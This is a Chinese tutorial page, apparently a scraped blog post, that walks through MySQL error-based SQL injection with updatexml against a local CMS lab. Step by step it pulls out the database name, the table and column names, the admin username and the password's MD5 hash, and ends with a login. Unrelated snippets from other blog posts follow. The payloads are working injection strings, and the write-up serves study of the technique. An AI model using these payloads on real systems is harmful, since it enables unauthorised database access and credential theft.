当前位置：首页 > news >正文

SQL注入之报错注入

news 2026/2/9 5:21:20

文章目录

报错注入是什么？
报错注入获取cms账号密码
成功登录

报错注入是什么？

在注入点的判断过程中，发现数据库中SQL 语句的报错信息，会显示在页面中，因此可以利用报错信息进行注入。
报错注入的原理，就是在错误信息中执行SQL 语句。触发报错的方式有很多，具体细节也不尽相同。此处建议直接背公式，将公式带换掉 1=1 的部分。

报错注入就是在判断SQL注入的注入点时发现数据库的报错信息会回显到页面上，那么就可以对报错信息进行注入操作。

报错注入获取cms账号密码

打开cms数据库的网页：http://127.0.0.1/cms/show.php?id=33，

打开hackbar插件，在URL中输入命令测试：

报错注入公式：

updatexml(1,concat(0x5e,(select database()),0x5e),1)

获取数据库名：

?id=33 and updatexml(1,concat(0x5e,(select database()),0x5e),1)

运行结果：

数据库名为cms

在这里插入图片描述

获取表个数：

count（*）：获取表个数

0x5e:^符，用来分割报错和输出的结果

concat：将多个字符连接成一个字符串

?id=33 and updatexml(1,concat(0x5e,(select count(*) from information_schema.tables where table_schema=database()),0x5e),1)

运行结果：

一共有8个表

在这里插入图片描述

逐个获取表名：

报错注入不同于联合查询，它只能逐个获取表名

limit 0，1：用来限定取第0行的一行记录，由于有8个表，也就是有8行数据，多取会报错。

information_schema 元数据数据库

存储库名、表名（-- tables）

存储列名（-- columns)））

取第0行的一行记录：

?id=33 and updatexml(1,concat(0x5e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x5e),1)

运行结果：

找出表名cms_article

在这里插入图片描述

去第1行的一行记录：

?id=33 and updatexml(1,concat(0x5e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x5e),1)

运行结果：

找出表名cms_category

在这里插入图片描述

以此类推，直到取出所有表名：

cms_article

cms_category

cms_file

cms_friendlink

cms_message

cms_notice

cms_page

cms_users

获取cms_users表的列的个数：

table_name=0x636d735f7573657273是cms_users表名转16进制后的结果，如果直接用表名’cms_users’，会导致表名被cms**转义并报错，**所以需要避免单引号的使用。

?id=33 and updatexml(1,concat(0x5e,(select count(*) from information_schema.columns where table_schema=database() and table_name=0x636d735f7573657273),0x5e),1)

运行结果：

cms_users表中一共有三列数据

在这里插入图片描述

获取cms_users表的列的字段（内容）：

limit 0，1：用来限定取第0行的一行记录，由于有3行数据，多取会报错。

limit 1，1：用来限定取第1行的一行记录，由于有3行数据，多取会报错。

…

取第一行数据：

?id=33 and updatexml(1,concat(0x5e,(select column_name from information_schema.columns where table_schema=database() and table_name=0x636d735f7573657273 limit 0,1),0x5e),1)

运行结果：

在这里插入图片描述

取第二行数据：

?id=33 and updatexml(1,concat(0x5e,(select column_name from information_schema.columns where table_schema=database() and table_name=0x636d735f7573657273 limit 1,1),0x5e),1)

运行结果：

在这里插入图片描述

取出的所有字段：

userid
username
password

获取username的内容：

?id=33 and updatexml(1,concat(0x5e,(select username from cms_users limit 0,1),0x5e),1)

运行结果：

用户名为admin

在这里插入图片描述

获取password中的密文：

length(password)：获取password的密文长度，由于password中的密码是一段md5密文，长度过长，不能一次取出，先获取长度后分次取出。

获取密文长度：

?id=33 and updatexml(1,concat(0x5e,(select length(password) from cms_users limit 0,1),0x5e),1)

运行结果：

md5密文长度是32

在这里插入图片描述

取前16位密码：

?id=33 and updatexml(1,concat(0x5e,(select substr(password,1,16) from cms_users limit 0,1),0x5e),1)

运行结果：

前16位md5密码密文

在这里插入图片描述

取后16位密码：

?id=33 and updatexml(1,concat(0x5e,(select substr(password,17,32) from cms_users limit 0,1),0x5e),1)

运行结果：

后16位密文

在这里插入图片描述

拼接后获得md5密码密文：

e10adc3949ba59abbe56e057f20f883e

解码得到明文密码：

成功登录

在这里插入图片描述

SQL注入之报错注入

文章目录报错注入是什么？报错注入获取cms账号密码成功登录报错注入是什么？ 在注入点的判断过程中，发现数据库中SQL 语句的报错信息，会显示在页面中，因此可以利用报错信息进行注入。报错注入的原理，就是在…...

编程日记 2023/8/30 0:05:26

基于大数据+django+mysql的银行信用卡用户的数仓系统

系统阐述的是银行信用卡用户的数仓系统的设计与实现，对于Python、B/S结构、MySql进行了较为深入的学习与应用。主要针对系统的设计，描述，实现和分析与测试方面来表明开发的过程。开发中使用了 django框架和MySql数据库技术搭建系统的整体架构…...

编程日记 2023/8/30 0:04:26

【网络】多路转接——五种IO模型 | select

🐱作者：一只大喵咪1201 🐱专栏：《网络》 🔥格言：你只管努力，剩下的交给时间！ 五种IO模型 | select 🍧五种IO模型🍧select🧁认识接口&#x1f9c1…...

编程日记 2023/8/30 0:03:24

sql顺序倒序查询

要根据 orderNum 字段的顺序查询，你可以使用 SQL 的 ORDER BY 子句。默认情况下，ORDER BY 是按升序排序的，但你可以使用 DESC 关键字来指定降序排序。以下是一个示例查询，按照 orderNum 字段的顺序将结果返回： SELEC…...

编程日记 2023/8/30 0:02:23

java和sql生成时间维度数据

JAVA: POM依赖： <dependency><groupId>cn.hutool</groupId><artifactId>hutool-all</artifactId><version>5.4.2</version></dependency> 代码： package com.kone.kcdp.common;import cn.hutool.co…...

编程日记 2023/8/30 0:01:22

HUT23级训练赛

目录 A - tmn学长的字符串1 B - 帮帮神君先生 C - z学长的猫 D - 这题用来防ak E - 这题考察FFT卷积 F - 这题考察二进制 G - 这题考察高精度 H - 这题考察签到 I - 爱派克斯，启动! J - tmn学长的字符串2 K - 秋奕来买瓜 A - tmn学长的字符串1 思路&#x…...

编程日记 2023/8/30 0:00:21

sm4 加解密算法工具类（java） 说明：密钥是 hexString import java.security.Key; import java.security.Security; import javax.crypto.Cipher; import javax.crypto.spec.SecretKeySpec;import cn.hutool.core.codec.Base64Decoder; import…...

编程日记 2023/8/29 23:59:19

Redis项目实战——商户查询缓存

目录为什么要用Redis实现商户查询缓存？用Redis实现商户查询缓存的基本思路？使用Redis缓存的问题及解决方法？一、如何保持数据库数据和Redis缓存数据的一致性？1 内存淘汰机制2 超时剔除机制3 主动更新机制（胜&#xff…...

编程日记 2023/8/29 23:58:18

重磅OpenAI发布ChatGPT企业版本

8月29日凌晨，Open AI官网发布ChatGPT企业版本！ 企业版简介： ChatGPT企业版提供企业级安全和隐私、无限的高速 GPT-4 访问、用于处理更长输入的更长上下文窗口、高级数据分析功能、自定义选项等等。人工智能可以协助和提升我们工作生活的各个…...

编程日记 2023/8/29 23:57:17

# Go学习-Day7

文章目录断言文件打开/关闭文件读取文件写入文件命令行参数解析Argsflag包 JSON 个人博客：CSDN博客断言 type Node struct {x inty int }func main() {var a interface{}var n Node Node{1, 2}a nvar b Nodeb a.(Node)fmt.Println(b) }此处我们有一个结构体…...

编程日记 2023/8/29 23:56:15

uniapp-form表单

<template><view class"ptb-20 plr-30 bg min100"><view class"bg-white radius-20 pd-30"><view class"bold mt-30 mb-50 size-32">选择方式：</view><u--form labelPosition"left" :mod…...

编程日记 2023/8/29 23:55:14

漏洞挖掘-利用

一、文章简介整合一些web漏洞，以及对漏洞的理解。二、Web漏洞 1.SQL注入 （1）定义开发者程序编写过程中，对传入用户数据过滤不严格，将可能存在的攻击载荷拼接到SQL查询语句当中，再将这些查询语句传递到…...

编程日记 2023/8/29 23:54:12

React钩子函数之useDeferredValue的基本使用

在React中，使用钩子函数可以方便地管理组件的状态和副作用。useDeferredValue是React 18中新引入的钩子函数之一，它可以帮助我们优化渲染性能，让组件更加流畅。 useDeferredValue的作用是将一个值延迟更新。这个值可以是状态、属性或其他变量…...

编程日记 2023/8/29 23:53:10

lodash常用方法

cloneDeep 克隆 import { cloneDeep，reduce } from lodash; const b {c:1} const a cloneDeep(b)debounce 防抖 import { debounce } from lodash; debounce(() > {}, 300, { trailing: true })()omit方法删除指定属性，返回一个新的对象 import …...

编程日记 2023/8/29 23:52:09

QByteArray与结构体之间相互转换

Qt项目会碰到自定义结构体和字符数组之间的转换问题，不妨假设结构体名字为custom_struct, 字符数组名字为array_data QByteArray转换为自定义结构体 custom_struct *struct_data reinterpret_cast<custom_struct *>(array_data.data());自定义结构体转换为…...

编程日记 2023/8/29 23:51:08